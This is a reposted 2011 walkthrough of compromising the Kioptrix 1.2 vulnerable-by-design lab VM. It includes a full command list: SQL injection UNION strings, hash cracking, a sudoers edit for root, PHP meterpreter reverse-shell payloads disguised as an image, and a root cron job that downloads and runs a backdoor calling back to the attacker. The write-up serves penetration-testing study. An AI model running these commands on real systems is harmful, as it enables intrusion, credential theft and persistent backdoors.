Sunday, September 11, 2011

HOWTO : Kioptrix - Level 1.2

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here


Watch video on-line
Download video

Brief Overview

It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.

The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.


Scanned network for the host (nmap)
Added IP address to the host file
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)
Enumerated database (manual MySQL injection)
Reused credentials granting a remote shell
Poorly configured setting to escape privileges (Unprotected limited root access)
Uploaded and used a web backdoor (Meterpreter)
Automated MySQL Injection (SQLMap)
Alternative method to gain root as well as escaping privileges (Cron Job)

What do I need?

Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
SQLMap – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).


The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.

Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).

Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).

The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".

One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.

After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".

When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.

The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".

A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.

After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.

With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...

Game over

Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.

By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.

(Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)

The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.

After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.

Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.

Game over...again


nmap 192.168.0.* -n -sn -sP
echo >> /etc/hosts # It's in the readme
cat /etc/hosts
us -H -msf -Iv -p 1-65535 && us -H -mU -Iv -p 1-65535
nmap -p 1-65535 -T4 -A -v
firefox # Link-> Blog
# Gallery --> Source code (gadmin):
cd /pentest/exploits/exploitdb
grep -i gallarific files.csv
cat platforms/php/webapps/15891.txt
firefox and 1=2 union select 1,2,3,4,5,6 and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6 and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6
echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d0 9794d8f021f40f0e" >> /tmp/hashes
cd /pentest/passwords/john
./john /tmp/hash --format=raw-md5
ssh # starwars
ls -lA
cat CompanyPolicy.README
ls -lh /etc/sudoers
cat /etc/sudoers
sudo ht # starwars File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save
sudo su # starwars
id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
cd /etc/apache2/sites-enabled
cat * | grep -i documentroot
firefox and 1=2 union select 1,2,3,4,5,6 and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6 and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6
cd /pentest/database/sqlmap
./ -u "" -f -b --current-user --is-dba --dbs
./ -u "" --columns
./ -u "" --users --passwords
./ -u "" --file-read="/etc/passwd"
./ -u "" --dump # admin n0t7t1k4 Upload new pic
cd /pentest/backdoors/web/webshells
ls -lAh
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > /tmp/evil.jpg # msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=443 R
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST= LPORT=443 E
su loneferret
echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/
su loneferret # starwars
sudo su # starwars
cd ~
cat Congrats.txt
ssh # starwars
cat CompanyPolicy.README
sudo ht
* * * * * root cd /tmp; wget && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit # /etc/cron.d/exploit
msfpayload linux/x86/shell_reverse_tcp LHOST= LPORT=443 X > /var/www/back.door
file /var/www/back.door
/etc/init.d/apache2 start
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST= LPORT=443 E
uname -a


- Editing the host file is mentioned in the README which is included (as well as on the blog post).

That's all! See you.